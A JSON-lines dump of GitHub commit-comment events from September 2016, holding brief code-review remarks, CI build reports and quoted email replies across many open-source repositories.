{"id":"4574291955","type":"CommitCommentEvent","actor":{"login":"bobjansen"},"repo":{"name":"whoshuu/cpr"},"payload":{"comment":{"id":19054827,"position":null,"line":null,"path":null,"commit_id":"822bd5ea765f37187cb75ac3435c769c5c711abf","created_at":"2016-09-16T14:15:28Z","updated_at":"2016-09-16T14:15:28Z","body":"Could you be more specific?"}},"created_at":"2016-09-16T14:15:28Z"}
{"id":"4574296536","type":"CommitCommentEvent","actor":{"login":"ibbatta"},"repo":{"name":"ibbatta/grunt-frontend-boilerplate"},"payload":{"comment":{"id":19054839,"position":18,"line":18,"path":"app/src/app.module.js","commit_id":"5b669a389ad2faf826aea49379af906b53e183bb","created_at":"2016-09-16T14:16:18Z","updated_at":"2016-09-16T14:16:18Z","body":"Yes is a \"preparation\" for further implementations (should I remove that for now?)"}},"created_at":"2016-09-16T14:16:18Z"}
{"id":"4574301005","type":"CommitCommentEvent","actor":{"login":"lsh-0"},"repo":{"name":"elifesciences/builder"},"payload":{"comment":{"id":19054853,"position":null,"line":null,"path":null,"commit_id":"8be745f6d7c94bf89af45f638a2f08ac3ab93b1d","created_at":"2016-09-16T14:17:06Z","updated_at":"2016-09-16T14:17:06Z","body":"never seen that usage before, but `dict()` does a shallow copy which should\nbe all we need. otherwise, do a `copy.deepcopy()`\n\nOn Fri, Sep 16, 2016 at 2:55 PM, Giorgio Sironi <notifications@github.com>\nwrote:\n\n> Ok, I thought it was idiomatic\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/elifesciences/builder/commit/8be745f6d7c94bf89af45f638a2f08ac3ab93b1d#commitcomment-19054520>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACCyHA6ipSY9Cdozsxs1v5_Z0wFqGYUtks5qqp_NgaJpZM4J-7UI>\n> .\n>\n\n\n\n-- \n\nLuke Skibinski\n\nFormally defined,\nExtensively tested,\nCryptic, abstract, thing.\n\n--\n\neLife Sciences Publications, Ltd is a limited liability non-profit\nnon-stock corporation incorporated in the State of Delaware, USA, with\ncompany number 5030732, and is registered in the UK with company number\nFC030576 and branch number BR015634 at the address First Floor, 24 Hills\nRoad, Cambridge CB2 1JP.\n"}},"created_at":"2016-09-16T14:17:06Z"}
{"id":"4574302327","type":"CommitCommentEvent","actor":{"login":"jo-pol"},"repo":{"name":"DANS-KNAW/course-scala"},"payload":{"comment":{"id":19054857,"position":4,"line":4,"path":"src/main/scala/workshop3/assignments/Employee.md","commit_id":"9bba11d5a87308652c0c0b35a17df3886fac2f87","created_at":"2016-09-16T14:17:20Z","updated_at":"2016-09-16T14:17:20Z","body":"ah, you git-ignored it"}},"created_at":"2016-09-16T14:17:20Z"}
{"id":"4574306809","type":"CommitCommentEvent","actor":{"login":"ct16k"},"repo":{"name":"voxpupuli/puppet-php"},"payload":{"comment":{"id":19054873,"position":null,"line":null,"path":null,"commit_id":"6d4534a1d2738e16bb93800ed547a937336b6367","created_at":"2016-09-16T14:18:10Z","updated_at":"2016-09-16T14:18:10Z","body":"Oh wow, I managed to completely miss the discussion in the PR, my apologies. We're going to move to Puppet 4 soon enough, and this is now just more incentive to do so. :)"}},"created_at":"2016-09-16T14:18:10Z"}
{"id":"4574311033","type":"CommitCommentEvent","actor":{"login":"nusnewob"},"repo":{"name":"uktrade/directory-form-data"},"payload":{"comment":{"id":19054884,"position":13,"line":82,"path":"data/settings.py","commit_id":"a1d1357d135b5b71724b0aef96c41f9e3c3d4c02","created_at":"2016-09-16T14:18:56Z","updated_at":"2016-09-16T14:18:56Z","body":"I'm not able to set all the DB parameters when deploying to ECS."}},"created_at":"2016-09-16T14:18:56Z"}
{"id":"4574311869","type":"CommitCommentEvent","actor":{"login":"ithinkihaveacat"},"repo":{"name":"GoogleChrome/gulliver"},"payload":{"comment":{"id":19054886,"position":45,"line":184,"path":"lib/pwa.js","commit_id":"6ef443463ffb7fbc3722c76f712a6dfe9c15cf94","created_at":"2016-09-16T14:19:07Z","updated_at":"2016-09-16T14:19:07Z","body":"Looking at this again now, I don't know that it makes sense to rethrow the exception, especially since the original exception is thrown away. I think we can just remove this bit, and let the caller worry about handling the catch."}},"created_at":"2016-09-16T14:19:07Z"}
{"id":"4574314243","type":"CommitCommentEvent","actor":{"login":"jtormey"},"repo":{"name":"blockchain/My-Wallet-V3"},"payload":{"comment":{"id":19054895,"position":7,"line":332,"path":"src/coinify/trade.js","commit_id":"c19dd18e60b5f9cd53279a798134737bc8bb2df6","created_at":"2016-09-16T14:19:34Z","updated_at":"2016-09-16T14:19:34Z","body":"The frontend expects this function to resolve with the updated trade instance"}},"created_at":"2016-09-16T14:19:34Z"}
{"id":"4574315614","type":"CommitCommentEvent","actor":{"login":"brianjgeiger"},"repo":{"name":"CenterForOpenScience/osf.io"},"payload":{"comment":{"id":19054900,"position":13,"line":45,"path":"api/search/views.py","commit_id":"046981e21de3632946f5f17c654969fc5626a4bc","created_at":"2016-09-16T14:19:49Z","updated_at":"2016-09-16T14:19:49Z","body":"Is it possible that REST_FRAMEWORK might not have a ['PAGE_SIZE']?"}},"created_at":"2016-09-16T14:19:49Z"}
{"id":"4574316381","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19054902,"position":45,"line":45,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/InMemoryMessageIdProvider.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-16T14:19:57Z","updated_at":"2016-09-16T14:19:57Z","body":"I don't know. If there is performance issue because of this, this map will not be the only one involved. (See maps in `InMemoryMessageExchangeStore`) and the performance issue will only occur the first morning. So, this seems to me as a premature optimization. \r\n\r\nTo confess I'm more worried about the potential memory leak with this map than this initialization issue."}},"created_at":"2016-09-16T14:19:57Z"}
{"id":"4574318423","type":"CommitCommentEvent","actor":{"login":"claradaia"},"repo":{"name":"whoshuu/cpr"},"payload":{"comment":{"id":19054907,"position":null,"line":null,"path":null,"commit_id":"822bd5ea765f37187cb75ac3435c769c5c711abf","created_at":"2016-09-16T14:20:21Z","updated_at":"2016-09-16T14:20:21Z","body":"I need libcurl to be linked statically, but current fork still has CMake option \"CURL_STATICLIB\" throwing a \"Static linking is broken!\" message. This has been fixed [here](https://github.com/curl/curl/commit/2f3feda273d7d31362c20b24602241fa0fcd0492) and merged a couple days ago."}},"created_at":"2016-09-16T14:20:21Z"}
{"id":"4574318663","type":"CommitCommentEvent","actor":{"login":"61Stan"},"repo":{"name":"eurosecom/projekt1"},"payload":{"comment":{"id":19054908,"position":null,"line":null,"path":null,"commit_id":"9bc31e48860f7c4d3cbdfb39ba82fe34ffbea3fe","created_at":"2016-09-16T14:20:23Z","updated_at":"2016-09-16T14:20:23Z","body":"Nemôžete spraviť nasledovne: jedna ikona export do xml, a podľa prepnutej strany bude dávať export aktuálnej strany"}},"created_at":"2016-09-16T14:20:23Z"}
{"id":"4574322507","type":"CommitCommentEvent","actor":{"login":"arni2033"},"repo":{"name":"mozilla/mozregression"},"payload":{"comment":{"id":19054922,"position":null,"line":null,"path":null,"commit_id":"ad76910fd0dfefb20697ca1fda18db71615bd8fd","created_at":"2016-09-16T14:21:03Z","updated_at":"2016-09-16T14:21:03Z","body":"@EricRahm \r\nCould you please release Mozregression GUI with this change asap? It haven't updated since 19 Mar\r\nThe number of \"autoland\" commits is growing rapidly."}},"created_at":"2016-09-16T14:21:03Z"}
{"id":"4574323131","type":"CommitCommentEvent","actor":{"login":"SowmyalakshmiAnanthachariA"},"repo":{"name":"SowmyalakshmiAnanthachariA/New-Project"},"payload":{"comment":{"id":19054926,"position":null,"line":null,"path":null,"commit_id":"78350863ab64b300c629a47151a38ed4a4b253b0","created_at":"2016-09-16T14:21:11Z","updated_at":"2016-09-16T14:21:11Z","body":"dcdc"}},"created_at":"2016-09-16T14:21:11Z"}
{"id":"4574323322","type":"CommitCommentEvent","actor":{"login":"bampakoa"},"repo":{"name":"ibbatta/grunt-frontend-boilerplate"},"payload":{"comment":{"id":19054927,"position":18,"line":18,"path":"app/src/app.module.js","commit_id":"5b669a389ad2faf826aea49379af906b53e183bb","created_at":"2016-09-16T14:21:13Z","updated_at":"2016-09-16T14:21:13Z","body":"What about adding it later in the routing mechanism? That is, on change of each route, the spinner will be shown."}},"created_at":"2016-09-16T14:21:13Z"}
{"id":"4574323614","type":"CommitCommentEvent","actor":{"login":"chrisknoll"},"repo":{"name":"OHDSI/Atlas"},"payload":{"comment":{"id":19054929,"position":null,"line":null,"path":null,"commit_id":"3aa20f2b9ffa010a6c7b3344f33d854de645b22c","created_at":"2016-09-16T14:21:16Z","updated_at":"2016-09-16T14:21:16Z","body":"Please rebase your local changes to master before pushing to the remote repository so we can avoid these needless merges."}},"created_at":"2016-09-16T14:21:16Z"}
{"id":"4574326042","type":"CommitCommentEvent","actor":{"login":"palkan1701"},"repo":{"name":"palkan1701/site"},"payload":{"comment":{"id":19054934,"position":7,"line":15,"path":"index.html","commit_id":"b1a8989869bec1fca6aed747d3302a71e378fdf2","created_at":"2016-09-16T14:21:41Z","updated_at":"2016-09-16T14:21:41Z","body":"[the well.docx](https://github.com/palkan1701/site/files/477031/the.well.docx)\r\n\r\n"}},"created_at":"2016-09-16T14:21:41Z"}
{"id":"4574331085","type":"CommitCommentEvent","actor":{"login":"bergquist"},"repo":{"name":"grafana/grafana"},"payload":{"comment":{"id":19054945,"position":null,"line":null,"path":null,"commit_id":"05d43999dc83c2adc5bda27eb8e41e0b762c35ea","created_at":"2016-09-16T14:22:35Z","updated_at":"2016-09-16T14:22:35Z","body":"It will get x (limit) annotations from now and backwards."}},"created_at":"2016-09-16T14:22:35Z"}
{"id":"4574333351","type":"CommitCommentEvent","actor":{"login":"Maigre"},"repo":{"name":"vberthiaume/HPlayer"},"payload":{"comment":{"id":19054950,"position":null,"line":null,"path":null,"commit_id":"7c92cda10413b951794d95208d420c4379698785","created_at":"2016-09-16T14:22:59Z","updated_at":"2016-09-16T14:22:59Z","body":"No problem,\nhope you will be able to run your project with the fix.\nThe recent discovery of MPV motivated me to work on HPlayer2, which is in\ngood progress right now.\nI'll implement the OSC the same way HPlayer did to keep it compatible (and\neasy to replace).\n\nI don't know when the first release is gonna be usable, maybe in a week or\nso.\nKeep an eye on https://github.com/Hemisphere-Project/HPlayer2 !\n\nBest Regards,\nThomas\n\n\n2016-09-16 15:18 GMT+02:00 Vincent Berthiaume <notifications@github.com>:\n\n> Thank you for doing all this work! So far I have something working-ish with\n> my (ridiculous) fixes to HPlayer so I don't really feel like trying a whole\n> new approach, especially because compiling on the pi is such a pain (i have\n> yet to set up a cross compiler...).\n>\n>\n> On Wed, Sep 14, 2016 at 11:00 AM, Maigre <notifications@github.com> wrote:\n>\n> > Hi,\n> > i did not succeed in building VLC again (spend couple hours trying by\n> > different ways..)\n> > BUT i did found this page:\n> > https://nwgat.ninja/installing-mpv-with-hardware-\n> > decoding-on-raspberry-pi-1-2-3-zero/\n> > it is a DEB package of ffmpeg + mpv (another player) ready for the pi AND\n> > with alsa support :)\n> >\n> > It is also possible to compile it from source, and to use there libmpv to\n> > embed in other applications.\n> > It definitly sounds like a good alternative to libvlc for the next\n> HPlayer\n> > version !\n> >\n> > I will dig into that, but right now you can use the DEBs provided to\n> > install the player.\n> > The documentation for MPV player can be found here:\n> > https://mpv.io/manual/stable/\n> > Let me know if it works out for you !\n> >\n> > Best Regards,\n> >\n> >\n> > 2016-09-13 17:50 GMT+02:00 Vincent Berthiaume <notifications@github.com\n> >:\n> >\n> > > sounds good, thank you so much!\n> > >\n> > > On Tue, Sep 13, 2016 at 11:49 AM, Maigre <notifications@github.com>\n> > wrote:\n> > >\n> > > > so i found it but i sadly did not compile it with static lib so it\n> > still\n> > > > require the custom recompiled version of libvlc which i do not have\n> > here.\n> > > > I'll try to recompile it properly and send it to you but it will take\n> > > some\n> > > > time (libvlc compiling takes couple hours...) i'll let you know if i\n> > end\n> > > up\n> > > > with something usable.\n> > > >\n> > > > —\n> > > > You are receiving this because you authored the thread.\n> > > > Reply to this email directly, view it on GitHub\n> > > > <https://github.com/vberthiaume/HPlayer/commit/\n> > > 7c92cda10413b951794d95208d420c4379698785#commitcomment-19003921>,\n> > > > or mute the thread\n> > > > <https://github.com/notifications/unsubscribe-auth/ADjIMdmpSrKSn2-\n> > > TLFn1nDMc2B4Luq48ks5qpsYcgaJpZM4J7ww8>\n> > >\n> > > > .\n> > > >\n> > >\n> > > —\n> > > You are receiving this because you commented.\n> > > Reply to this email directly, view it on GitHub\n> > > <https://github.com/vberthiaume/HPlayer/commit/\n> > 7c92cda10413b951794d95208d420c4379698785#commitcomment-19003942>,\n> > > or mute the thread\n> > > <https://github.com/notifications/unsubscribe-auth/\n> > AAq2wWJRb4QkHgtgeG8doyvZbl38ZL5Bks5qpsZUgaJpZM4J7ww8>\n> >\n> > > .\n> > >\n> >\n> > —\n> > You are receiving this because you authored the thread.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/vberthiaume/HPlayer/commit/\n> 7c92cda10413b951794d95208d420c4379698785#commitcomment-19020501>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/\n> ADjIMU9Bj3pbyWO1r6GJXJ8j5sPBujvcks5qqAwagaJpZM4J7ww8>\n>\n> > .\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/vberthiaume/HPlayer/commit/7c92cda10413b951794d95208d420c4379698785#commitcomment-19053971>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAq2wT-rv59V6m4CeuEFeBsIMnf2JppCks5qqpc9gaJpZM4J7ww8>\n> .\n>\n"}},"created_at":"2016-09-16T14:22:59Z"}
{"id":"4574334088","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19054956,"position":null,"line":null,"path":null,"commit_id":"c7ce679553df6bdcc9522ab7fd84bac0f6cba131","created_at":"2016-09-16T14:23:10Z","updated_at":"2016-09-16T14:23:10Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1029](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13446&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-16T14:23:10Z"}
{"id":"4574336632","type":"CommitCommentEvent","actor":{"login":"aviadhahami"},"repo":{"name":"jacklam718/react-native-popup-dialog"},"payload":{"comment":{"id":19054967,"position":null,"line":null,"path":null,"commit_id":"284417ae70d1eab8b0c0fdb9e18ea8601035d741","created_at":"2016-09-16T14:23:35Z","updated_at":"2016-09-16T14:23:35Z","body":"what about default value then? :) "}},"created_at":"2016-09-16T14:23:35Z"}
{"id":"4574337196","type":"CommitCommentEvent","actor":{"login":"davidben"},"repo":{"name":"openssl/openssl"},"payload":{"comment":{"id":19054970,"position":null,"line":null,"path":null,"commit_id":"3c0c68ae460e947aaae5702bda6258fb812e1029","created_at":"2016-09-16T14:23:41Z","updated_at":"2016-09-16T14:23:41Z","body":"Looks like we're pretty aggressive and use 4. I don't think anyone actually uses these things, but for a scattering of bad decisions here and there. In TLS 1.3, warning alerts are even gone and they're all fatal."}},"created_at":"2016-09-16T14:23:41Z"}
{"id":"4574339914","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19054977,"position":null,"line":null,"path":null,"commit_id":"6e7b2b73ccb2f11723abf94b2ee3d2f74b84bd7e","created_at":"2016-09-16T14:24:12Z","updated_at":"2016-09-16T14:24:12Z","body":"5039_stratified_tank_speedup (nmerket) - i386-Windows-7-VisualStudio-12: OK (2335 of 2337 tests passed, 6 test warnings)\n\n * 3 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 6 tests had: ESO small diffs.\n * 2 tests had: MTR small diffs.\n * 1 test had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6e7b2b73ccb2f11723abf94b2ee3d2f74b84bd7e-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6e7b2b73ccb2f11723abf94b2ee3d2f74b84bd7e-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.91%25-yellow.svg)</a> \n"}},"created_at":"2016-09-16T14:24:12Z"}
{"id":"4574341435","type":"CommitCommentEvent","actor":{"login":"ibbatta"},"repo":{"name":"ibbatta/grunt-frontend-boilerplate"},"payload":{"comment":{"id":19054979,"position":18,"line":18,"path":"app/src/app.module.js","commit_id":"5b669a389ad2faf826aea49379af906b53e183bb","created_at":"2016-09-16T14:24:25Z","updated_at":"2016-09-16T14:24:25Z","body":"Yes, why not! I add it in the todo list"}},"created_at":"2016-09-16T14:24:25Z"}
{"id":"4574341988","type":"CommitCommentEvent","actor":{"login":"jbmoelker"},"repo":{"name":"JesseE/nunjucks"},"payload":{"comment":{"id":19054981,"position":null,"line":null,"path":null,"commit_id":"7a31448ad2659529e674cbc47818c59dc4bc8154","created_at":"2016-09-16T14:24:31Z","updated_at":"2016-09-16T14:24:31Z","body":"I think you can reduce:\r\n\r\n```markdown\r\nNunjucks has ported most of jinja's filters, and has a few of its own.  We need\r\nto work on our own documentation for filters. Some of them are documented\r\nbelow, for the rest you can click through to [jinja's site](http://jinja.pocoo.org/docs/dev/templates/#builtin-filters).\r\n```\r\nto\r\n```markdown\r\nNunjucks has ported most of Jinja's filters, and has a few of its own:\r\n```\r\n"}},"created_at":"2016-09-16T14:24:31Z"}
{"id":"4574343331","type":"CommitCommentEvent","actor":{"login":"KairusDarkSeeker"},"repo":{"name":"KairusDarkSeeker/SkinStealer"},"payload":{"comment":{"id":19054988,"position":null,"line":null,"path":null,"commit_id":"ad979b4c323a80098598e48a3ff903d9ace22f56","created_at":"2016-09-16T14:24:43Z","updated_at":"2016-09-16T14:24:43Z","body":"Okay"}},"created_at":"2016-09-16T14:24:43Z"}
{"id":"4574343892","type":"CommitCommentEvent","actor":{"login":"lasconic"},"repo":{"name":"musescore/MuseScore"},"payload":{"comment":{"id":19054989,"position":null,"line":null,"path":null,"commit_id":"1b7daeb3830fbc6b706610eb0f2fd19f419c5c7a","created_at":"2016-09-16T14:24:48Z","updated_at":"2016-09-16T14:24:48Z","body":"There you go https://github.com/musescore/MuseScore/commit/a6cf13772f7ca0afa9154fd08d242a5df0ec6e9e"}},"created_at":"2016-09-16T14:24:48Z"}
{"id":"4574348750","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19055005,"position":9,"line":12,"path":"crytographic_primitives.md","commit_id":"ed8629b5759fed4b245e9998e10be280a5974e5c","created_at":"2016-09-16T14:25:38Z","updated_at":"2016-09-16T14:25:38Z","body":"Thanks! Fixed on: 20d2b85"}},"created_at":"2016-09-16T14:25:38Z"}
{"id":"4574348987","type":"CommitCommentEvent","actor":{"login":"IrcDirk"},"repo":{"name":"mikepauer/Carbonite"},"payload":{"comment":{"id":19055009,"position":null,"line":null,"path":null,"commit_id":"c247160a5fa6028d02adbc0dab506cd45564eede","created_at":"2016-09-16T14:25:41Z","updated_at":"2016-09-16T14:25:41Z","body":"Message removed and memory optimized => https://github.com/mikepauer/Carbonite/commit/87544728be19790704dd454b03dfbf8f25900f0f"}},"created_at":"2016-09-16T14:25:41Z"}
{"id":"4574350016","type":"CommitCommentEvent","actor":{"login":"IsaacWeiss"},"repo":{"name":"musescore/MuseScore"},"payload":{"comment":{"id":19055015,"position":null,"line":null,"path":null,"commit_id":"1b7daeb3830fbc6b706610eb0f2fd19f419c5c7a","created_at":"2016-09-16T14:25:51Z","updated_at":"2016-09-16T14:25:51Z","body":"Sweet!"}},"created_at":"2016-09-16T14:25:51Z"}
{"id":"4574351768","type":"CommitCommentEvent","actor":{"login":"5cript"},"repo":{"name":"5cript/dll"},"payload":{"comment":{"id":19055020,"position":null,"line":null,"path":null,"commit_id":"cb79b98df9fe480a4dec4170044f379f4d0f815a","created_at":"2016-09-16T14:26:12Z","updated_at":"2016-09-16T14:26:12Z","body":"```C++\r\nDLL_DECLARE_INTERFACE\r\n(\r\n    MyInterface,\r\n    (std::function <void (char*)>, free_buffer)\r\n    (std::function <void(const char*, char**)>, markup_to_json)\r\n    (std::function <void(const char*, char**)>, json_to_markup)\r\n)\r\n```\r\n"}},"created_at":"2016-09-16T14:26:12Z"}
{"id":"4574355789","type":"CommitCommentEvent","actor":{"login":"marc-harry"},"repo":{"name":"marc-harry/angular2-seed-ngrx-store"},"payload":{"comment":{"id":19055030,"position":null,"line":null,"path":null,"commit_id":"b829867e95c52250e86f5bcad975e1e4ef11b279","created_at":"2016-09-16T14:26:52Z","updated_at":"2016-09-16T14:26:52Z","body":"Resolve issue #1 "}},"created_at":"2016-09-16T14:26:52Z"}
{"id":"4574357147","type":"CommitCommentEvent","actor":{"login":"getsadzeg"},"repo":{"name":"getsadzeg/survey-client"},"payload":{"comment":{"id":19055032,"position":null,"line":null,"path":null,"commit_id":"a3b1649f060714ae9b4f5284c9a233323dd78c82","created_at":"2016-09-16T14:27:06Z","updated_at":"2016-09-16T14:27:06Z","body":"[probably a bug in library itself](https://github.com/mauriciotogneri/green-coffee/issues/1)"}},"created_at":"2016-09-16T14:27:06Z"}
{"id":"4574367299","type":"CommitCommentEvent","actor":{"login":"SimonSuster"},"repo":{"name":"PieterFivez/Accumulate"},"payload":{"comment":{"id":19055053,"position":null,"line":null,"path":null,"commit_id":"c5806c34b11cafebdcb5959dd0158c622e2d6a90","created_at":"2016-09-16T14:28:52Z","updated_at":"2016-09-16T14:28:52Z","body":"Thanks. Some remarks:\r\n- can you add the plot for different values of the candidate-list size (or of the difference in cosine score)?\r\n- the domain mismatch between `typos` and mimic probably does not give a very accurate picture...\r\n- can you report this score (or the final f-score)  on the twitter data (by always taking the right candidate?\r\n"}},"created_at":"2016-09-16T14:28:52Z"}
{"id":"4574367515","type":"CommitCommentEvent","actor":{"login":"frutuozo29"},"repo":{"name":"jorgemirandaneto/JLib"},"payload":{"comment":{"id":19055054,"position":2,"line":2,"path":".settings/org.eclipse.wst.common.component","commit_id":"d2a3ebd7acefafc8af3bee8c1b656e68dd8eca65","created_at":"2016-09-16T14:28:54Z","updated_at":"2016-09-16T14:28:54Z","body":"Ainda tá com nome Drogaria."}},"created_at":"2016-09-16T14:28:54Z"}
{"id":"4574368611","type":"CommitCommentEvent","actor":{"login":"EdupazRao"},"repo":{"name":"EdupazRao/OlaMundo"},"payload":{"comment":{"id":19055058,"position":null,"line":null,"path":null,"commit_id":"8da685d473bf6e2d1f1e7f37030fcdd5c74f8c88","created_at":"2016-09-16T14:29:07Z","updated_at":"2016-09-16T14:29:07Z","body":"Bora começar a estudar."}},"created_at":"2016-09-16T14:29:07Z"}
{"id":"4574368953","type":"CommitCommentEvent","actor":{"login":"atvcaptain"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19055061,"position":null,"line":null,"path":null,"commit_id":"a011ee86fc89ad2af8ce96842d01b550ab0bebee","created_at":"2016-09-16T14:29:11Z","updated_at":"2016-09-16T14:29:11Z","body":"all atv image image update now broken , please fix asap\r\n\r\n\"/usr/lib/enigma2/python/Plugins/SystemPlugins/SoftwareManager/Flash_online.py\", line 680, in run\r\n16:04:08.732 { D }   File \"/usr/lib/enigma2/python/Tools/Downloader.py\", line 45, in init\r\n16:04:08.736 { D } ImportError: cannot import name _URI\r\n16:04:08.736 [ E ] python/python.cpp:209 call (PyObject_CallObject(<bound method ActionMap.action of <Components.ActionMap.ActionMap instance at 0x6df79be8>>,('ColorActions', 'green')) failed)\r\n\r\n\r\nfrom twisted.web.client import _URI\r\n   uri = _URI.fromBytes(url)"}},"created_at":"2016-09-16T14:29:11Z"}
{"id":"4574372007","type":"CommitCommentEvent","actor":{"login":"frutuozo29"},"repo":{"name":"jorgemirandaneto/JLib"},"payload":{"comment":{"id":19055067,"position":17,"line":17,"path":"pom.xml","commit_id":"d2a3ebd7acefafc8af3bee8c1b656e68dd8eca65","created_at":"2016-09-16T14:29:43Z","updated_at":"2016-09-16T14:29:43Z","body":"Nome Drogaria @jorgemirandaneto "}},"created_at":"2016-09-16T14:29:43Z"}
{"id":"4574372516","type":"CommitCommentEvent","actor":{"login":"jbmoelker"},"repo":{"name":"JesseE/nunjucks"},"payload":{"comment":{"id":19055070,"position":null,"line":null,"path":null,"commit_id":"7ebeafe4bc72b1501cd65da9992387f788d0a017","created_at":"2016-09-16T14:29:48Z","updated_at":"2016-09-16T14:29:48Z","body":"Looks good! Consider adding `shrink-to-fit=no`: http://v4-alpha.getbootstrap.com/getting-started/introduction/#responsive-meta-tag\r\n\r\nYou could use (part of) the text behind that link as argumentation in your PR."}},"created_at":"2016-09-16T14:29:48Z"}
{"id":"4574374976","type":"CommitCommentEvent","actor":{"login":"jorgemirandaneto"},"repo":{"name":"jorgemirandaneto/JLib"},"payload":{"comment":{"id":19055076,"position":17,"line":17,"path":"pom.xml","commit_id":"d2a3ebd7acefafc8af3bee8c1b656e68dd8eca65","created_at":"2016-09-16T14:30:17Z","updated_at":"2016-09-16T14:30:17Z","body":"aonde fela\n\n\n2016-09-16 11:29 GMT-03:00 Renan Frutuozo <notifications@github.com>:\n\n> Nome Drogaria @jorgemirandaneto <https://github.com/jorgemirandaneto>\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jorgemirandaneto/JLib/commit/d2a3ebd7acefafc8af3bee8c1b656e68dd8eca65#commitcomment-19055067>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AOo_BPipeCnEd4ljc4IFTQzpPb1Mt7CQks5qqqfXgaJpZM4J-_35>\n> .\n>\n"}},"created_at":"2016-09-16T14:30:17Z"}
{"id":"4574376919","type":"CommitCommentEvent","actor":{"login":"torkelo"},"repo":{"name":"grafana/grafana"},"payload":{"comment":{"id":19055079,"position":null,"line":null,"path":null,"commit_id":"05d43999dc83c2adc5bda27eb8e41e0b762c35ea","created_at":"2016-09-16T14:30:35Z","updated_at":"2016-09-16T14:30:35Z","body":"ok, so maybe instead of having a checkbox it could be a dropdown?\r\n\r\nLimit: \r\n- Dashboard time range\r\n- Last hour\r\n- Last 5x\r\n- Last 10x\r\n- Last 20x\r\n- Last 50x\r\n\r\nhm.. or. Not sure, the checkbox feels wrong here. some more general option, but not sure what is simplest / most intuitive "}},"created_at":"2016-09-16T14:30:35Z"}
{"id":"4574379035","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19055083,"position":null,"line":null,"path":null,"commit_id":"c7ce679553df6bdcc9522ab7fd84bac0f6cba131","created_at":"2016-09-16T14:30:56Z","updated_at":"2016-09-16T14:30:56Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1029](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13446&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 249, ignored: 3 Build time: 00:07:46"}},"created_at":"2016-09-16T14:30:56Z"}
{"id":"4574382698","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19055093,"position":null,"line":null,"path":null,"commit_id":"6e7b2b73ccb2f11723abf94b2ee3d2f74b84bd7e","created_at":"2016-09-16T14:31:34Z","updated_at":"2016-09-16T14:31:34Z","body":"5039_stratified_tank_speedup (nmerket) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2369 of 2371 tests passed, 6 test warnings)\n\n * 3 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: MTR small diffs.\n * 1 test had: Table small diffs.\n * 6 tests had: ESO small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6e7b2b73ccb2f11723abf94b2ee3d2f74b84bd7e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6e7b2b73ccb2f11723abf94b2ee3d2f74b84bd7e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.92%25-yellow.svg)</a> \n"}},"created_at":"2016-09-16T14:31:34Z"}
{"id":"4574384561","type":"CommitCommentEvent","actor":{"login":"kgrgreer"},"repo":{"name":"shepheb/foam2-experimental"},"payload":{"comment":{"id":19055102,"position":3,"line":45,"path":"src/foam/u2/search/GroupAutocompleteSearchView.js","commit_id":"5e2a4281aba408a0a03a7afab8c17af666cdbf49","created_at":"2016-09-16T14:31:52Z","updated_at":"2016-09-16T14:31:52Z","body":"Can we just call this 'view'?"}},"created_at":"2016-09-16T14:31:52Z"}
